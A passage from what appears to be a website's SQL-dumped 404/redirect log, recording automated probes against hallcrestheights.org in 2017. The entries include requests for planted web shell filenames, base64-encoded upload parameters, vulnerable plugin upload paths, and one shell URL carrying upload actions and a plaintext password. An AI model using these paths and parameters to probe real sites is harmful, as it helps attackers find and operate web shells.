00:00:00'),(10404,'http://www.hallcrestheights.org/main/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 21:33:07','0000-00-00 00:00:00'),(10405,'http://www.hallcrestheights.org/test/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 23:48:46','0000-00-00 00:00:00'),(10406,'http://hallcrestheights.org/site/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 00:39:21','0000-00-00 00:00:00'),(10407,'http://www.hallcrestheights.org/home/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 00:57:26','0000-00-00 00:00:00'),(10408,'http://www.hallcrestheights.org/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 00:58:15','0000-00-00 00:00:00'),(10409,'http://hallcrestheights.org/en/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 01:16:10','0000-00-00 00:00:00'),(10410,'http://www.hallcrestheights.org/i20162637-dvisciwb-k60940-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-05-31 02:52:05','0000-00-00 00:00:00'),(10411,'http://www.hallcrestheights.org/i20162632-k36620-jgletkym-drqzn-rvmlkswa-zvkecqq.htm',NULL,'','',1,0,'2017-05-31 02:55:28','0000-00-00 00:00:00'),(10412,'http://hallcrestheights.org/functions.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:50:31','0000-00-00 00:00:00'),(10413,'http://hallcrestheights.org/images/1ndex.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:51:57','0000-00-00 00:00:00'),(10414,'http://hallcrestheights.org/configbak.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:50:51','0000-00-00 00:00:00'),(10415,'http://hallcrestheights.org/images/defau1t.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:52:39','0000-00-00 00:00:00'),(10416,'http://hallcrestheights.org/cache/cachee.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:52:40','0000-00-00 00:00:00'),(10417,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:53:05','0000-00-00 00:00:00'),(10418,'http://hallcrestheights.org/maill.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:53:08','0000-00-00 00:00:00'),(10419,'http://hallcrestheights.org/wp-cache.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:51:51','0000-00-00 00:00:00'),(10420,'http://hallcrestheights.org/robot.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:53:42','0000-00-00 00:00:00'),(10421,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:53:46','0000-00-00 00:00:00'),(10422,'http://hallcrestheights.org/SessionController.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:53:48','0000-00-00 00:00:00'),(10423,'http://hallcrestheights.org/webconfig.txt.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:52:32','0000-00-00 00:00:00'),(10424,'http://hallcrestheights.org/news.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:54:24','0000-00-00 00:00:00'),(10425,'http://hallcrestheights.org/configurationbak.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:29','0000-00-00 00:00:00'),(10426,'http://hallcrestheights.org/robots.txt.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:31','0000-00-00 00:00:00'),(10427,'http://hallcrestheights.org/images/404.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:53:18','0000-00-00 00:00:00'),(10428,'http://hallcrestheights.org/sql_dump.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:42','0000-00-00 00:00:00'),(10429,'http://hallcrestheights.org/jconfig.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:44','0000-00-00 00:00:00'),(10430,'http://hallcrestheights.org/thumb.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:51','0000-00-00 00:00:00'),(10431,'http://hallcrestheights.org/xmlrpc-activate.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:55:20','0000-00-00 00:00:00'),(10432,'http://hallcrestheights.org/al277.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:55:21','0000-00-00 00:00:00'),(10433,'http://hallcrestheights.org/images/al277.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:54:05','0000-00-00 00:00:00'),(10434,'http://hallcrestheights.org/wsdl.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:55:30','0000-00-00 00:00:00'),(10435,'http://hallcrestheights.org/wp-data.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:55:37','0000-00-00 00:00:00'),(10436,'http://hallcrestheights.org/media/1ndex.php?z3=eGdFcnBGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:56:29','0000-00-00 00:00:00'),(10437,'http://hallcrestheights.org/media/tmp.php?z3=eGdFcnBGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:56:33','0000-00-00 00:00:00'),(10438,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:56:39','0000-00-00 00:00:00'),(10439,'http://hallcrestheights.org/google-assist.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:56:46','0000-00-00 00:00:00'),(10440,'http://hallcrestheights.org/images/google-assist.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:57:14','0000-00-00 00:00:00'),(10441,'http://hallcrestheights.org/elements.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:57:15','0000-00-00 00:00:00'),(10442,'http://hallcrestheights.org/cache/defau1t.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:57:17','0000-00-00 00:00:00'),(10443,'http://hallcrestheights.org/roubt.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:57:19','0000-00-00 00:00:00'),(10444,'http://hallcrestheights.org/bookmark.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:57:21','0000-00-00 00:00:00'),(10445,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:56:34','0000-00-00 00:00:00'),(10446,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:56:59','0000-00-00 00:00:00'),(10447,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:58:23','0000-00-00 00:00:00'),(10448,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=eGdFcnBGLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:59:04','0000-00-00 00:00:00'),(10449,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:59:29','0000-00-00 00:00:00'),(10450,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:59:33','0000-00-00 00:00:00'),(10451,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:59:37','0000-00-00 00:00:00'),(10452,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:59:39','0000-00-00 00:00:00'),(10453,'http://hallcrestheights.org/A.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:59:55','0000-00-00 00:00:00'),(10454,'http://hallcrestheights.org/modules/modules/modules.php?z3=eGdFcnBGLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:00:16','0000-00-00 00:00:00'),(10455,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-05-31 03:59:01','0000-00-00 00:00:00'),(10456,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:00:24','0000-00-00 00:00:00'),(10457,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:00:27','0000-00-00 00:00:00'),(10458,'http://hallcrestheights.org/sqlbak.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 03:59:39','0000-00-00 00:00:00'),(10459,'http://hallcrestheights.org/email.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:01:31','0000-00-00 00:00:00'),(10460,'http://hallcrestheights.org/images/stories/0day.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:01:32','0000-00-00 00:00:00'),(10461,'http://hallcrestheights.org/install.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:01:38','0000-00-00 00:00:00'),(10462,'http://hallcrestheights.org/goog1es.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:00:41','0000-00-00 00:00:00'),(10463,'http://hallcrestheights.org/error-log.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:02:27','0000-00-00 00:00:00'),(10464,'http://hallcrestheights.org/xmlsrpc.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:02:28','0000-00-00 00:00:00'),(10465,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:02:31','0000-00-00 00:00:00'),(10466,'http://hallcrestheights.org/shootmei.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:02:33','0000-00-00 00:00:00'),(10467,'http://hallcrestheights.org/infos.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:03:09','0000-00-00 00:00:00'),(10468,'http://hallcrestheights.org/content.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:03:34','0000-00-00 00:00:00'),(10469,'http://hallcrestheights.org/Abbrevsprl.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:03:14','0000-00-00 00:00:00'),(10470,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:05:11','0000-00-00 00:00:00'),(10471,'http://hallcrestheights.org/RoseLeif.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:05:53','0000-00-00 00:00:00'),(10472,'http://hallcrestheights.org/shootme.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:06:16','0000-00-00 00:00:00'),(10473,'http://hallcrestheights.org/images/xxx.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:06:39','0000-00-00 00:00:00'),(10474,'http://hallcrestheights.org/cache/support.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:08:30','0000-00-00 00:00:00'),(10475,'http://hallcrestheights.org/media/404.php?z3=eGdFcnBGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:08:55','0000-00-00 00:00:00'),(10476,'http://hallcrestheights.org/authenticating.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:07:38','0000-00-00 00:00:00'),(10477,'http://hallcrestheights.org/show.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:07:41','0000-00-00 00:00:00'),(10478,'http://hallcrestheights.org/cache/news.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:07:45','0000-00-00 00:00:00'),(10479,'http://hallcrestheights.org/images/head.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:09:10','0000-00-00 00:00:00'),(10480,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:09:15','0000-00-00 00:00:00'),(10481,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:09:18','0000-00-00 00:00:00'),(10482,'http://hallcrestheights.org/media/reads.php?z3=eGdFcnBGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:09:49','0000-00-00 00:00:00'),(10483,'http://hallcrestheights.org/files/files.php?z3=eGdFcnBGLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:09:51','0000-00-00 00:00:00'),(10484,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=eGdFcnBGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:08:39','0000-00-00 00:00:00'),(10485,'http://hallcrestheights.org/images/stories/rekan.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',12,0,'2017-05-31 04:10:14','0000-00-00 00:00:00'),(10486,'http://hallcrestheights.org/files/conn.php?z3=eGdFcnBGLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:09:17','0000-00-00 00:00:00'),(10487,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/xgErpF.php',NULL,'','',1,0,'2017-05-31 04:10:39','0000-00-00 00:00:00'),(10488,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/xgErpF.php',NULL,'','',1,0,'2017-05-31 04:10:41','0000-00-00 00:00:00'),(10489,'http://hallcrestheights.org/wp-content/uploads/xgErpF.php',NULL,'','',1,0,'2017-05-31 04:10:44','0000-00-00 00:00:00'),(10490,'http://hallcrestheights.org/xgErpF.php',NULL,'','',1,0,'2017-05-31 04:10:49','0000-00-00 00:00:00'),(10491,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/xgErpF.php',NULL,'','',1,0,'2017-05-31 04:09:32','0000-00-00 00:00:00'),(10492,'http://hallcrestheights.org/cache/list.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:09:55','0000-00-00 00:00:00'),(10493,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=eGdFcnBGLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:11:38','0000-00-00 00:00:00'),(10494,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:12:03','0000-00-00 00:00:00'),(10495,'http://hallcrestheights.org/images/laj.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-31 04:12:56','0000-00-00 00:00:00'),(10496,'http://hallcrestheights.org/log.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:04','0000-00-00 00:00:00'),(10497,'http://hallcrestheights.org/includes/u2p.php?z3=eGdFcnBGLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:06','0000-00-00 00:00:00'),(10498,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=eGdFcnBGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:10','0000-00-00 00:00:00'),(10499,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=eGdFcnBGLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:14','0000-00-00 00:00:00'),(10500,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=eGdFcnBGLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:18','0000-00-00 00:00:00'),(10501,'http://hallcrestheights.org/wp-main.php?z3=eGdFcnBGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:13:27','0000-00-00 00:00:00'),(10502,'http://hallcrestheights.org/images/robots.txt.php?z3=eGdFcnBGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:12:09','0000-00-00 00:00:00'),(10503,'http://hallcrestheights.org/cli/40dd1d.php?z3=eGdFcnBGLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-31 04:12:12','0000-00-00 00:00:00'),(10504,'http://www.hallcrestheights.org/blogs/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 04:46:08','0000-00-00 00:00:00'),(10505,'http://www.hallcrestheights.org/wp/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 04:55:20','0000-00-00 00:00:00'),(10506,'http://www.hallcrestheights.org/site/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 07:32:48','0000-00-00 00:00:00'),(10507,'http://www.hallcrestheights.org/new/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 09:44:38','0000-00-00 00:00:00'),(10508,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-xkcwj-k15453-ybty-i20162630-lwosdu-ieqgws/',NULL,'','',4,0,'2017-05-31 13:20:33','0000-00-00 00:00:00'),(10509,'http://www.hallcrestheights.org/web/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 13:31:00','0000-00-00 00:00:00'),(10510,'http://www.hallcrestheights.org/en/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 18:58:01','0000-00-00 00:00:00'),(10511,'http://hallcrestheights.org/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 19:50:49','0000-00-00 00:00:00'),(10512,'http://hallcrestheights.org/blogs/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-31 20:37:00','0000-00-00 00:00:00'),(10513,'http://hallcrestheights.org/libraries/joomla/implement.php',NULL,'http://hallcrestheights.org/','',1,0,'2017-06-02 12:07:46','0000-00-00 00:00:00'),(10514,'http://www.hallcrestheights.org/k22112-jgle-tkymdrq-i20162634-znrvm-lkswaz.htm',NULL,'','',1,0,'2017-06-02 14:02:55','0000-00-00 00:00:00'),(10515,'http://hallcrestheights.org/configbak.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:26:09','0000-00-00 00:00:00'),(10516,'http://hallcrestheights.org/maill.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:26:48','0000-00-00 00:00:00'),(10517,'http://hallcrestheights.org/wp-cache.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:28:10','0000-00-00 00:00:00'),(10518,'http://hallcrestheights.org/SessionController.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:29:31','0000-00-00 00:00:00'),(10519,'http://hallcrestheights.org/webconfig.txt.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:29:33','0000-00-00 00:00:00'),(10520,'http://hallcrestheights.org/news.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-02 19:29:39','0000-00-00 00:00:00'),(10521,'http://hallcrestheights.org/thumb.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:33:09','0000-00-00 00:00:00'),(10522,'http://hallcrestheights.org/al277.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:33:54','0000-00-00 00:00:00'),(10523,'http://hallcrestheights.org/images/al277.php?z3=blhoMW9aLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:32:36','0000-00-00 00:00:00'),(10524,'http://hallcrestheights.org/wsdl.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:33:59','0000-00-00 00:00:00'),(10525,'http://hallcrestheights.org/wp-data.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:34:00','0000-00-00 00:00:00'),(10526,'http://hallcrestheights.org/media/tmp.php?z3=blhoMW9aLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:33:59','0000-00-00 00:00:00'),(10527,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:34:13','0000-00-00 00:00:00'),(10528,'http://hallcrestheights.org/google-assist.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:34:23','0000-00-00 00:00:00'),(10529,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-02 19:39:55','0000-00-00 00:00:00'),(10530,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:39:56','0000-00-00 00:00:00'),(10531,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:45:55','0000-00-00 00:00:00'),(10532,'http://hallcrestheights.org/install.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:48:03','0000-00-00 00:00:00'),(10533,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:50:07','0000-00-00 00:00:00'),(10534,'http://hallcrestheights.org/shootmei.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:50:09','0000-00-00 00:00:00'),(10535,'http://hallcrestheights.org/infos.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-02 19:50:32','0000-00-00 00:00:00'),(10536,'http://hallcrestheights.org/cache/support.php?z3=blhoMW9aLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-02 19:56:35','0000-00-00 00:00:00'),(10537,'http://hallcrestheights.org/show.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:56:33','0000-00-00 00:00:00'),(10538,'http://hallcrestheights.org/cache/news.php?z3=blhoMW9aLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:57:55','0000-00-00 00:00:00'),(10539,'http://hallcrestheights.org/images/head.php?z3=blhoMW9aLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:57:57','0000-00-00 00:00:00'),(10540,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:57:58','0000-00-00 00:00:00'),(10541,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=blhoMW9aLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 19:58:00','0000-00-00 00:00:00'),(10542,'http://hallcrestheights.org/files/files.php?z3=blhoMW9aLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-02 19:58:59','0000-00-00 00:00:00'),(10543,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/nXh1oZ.php',NULL,'','',1,0,'2017-06-02 20:00:24','0000-00-00 00:00:00'),(10544,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/nXh1oZ.php',NULL,'','',1,0,'2017-06-02 20:00:27','0000-00-00 00:00:00'),(10545,'http://hallcrestheights.org/wp-content/uploads/nXh1oZ.php',NULL,'','',1,0,'2017-06-02 20:00:30','0000-00-00 00:00:00'),(10546,'http://hallcrestheights.org/nXh1oZ.php',NULL,'','',1,0,'2017-06-02 20:00:31','0000-00-00 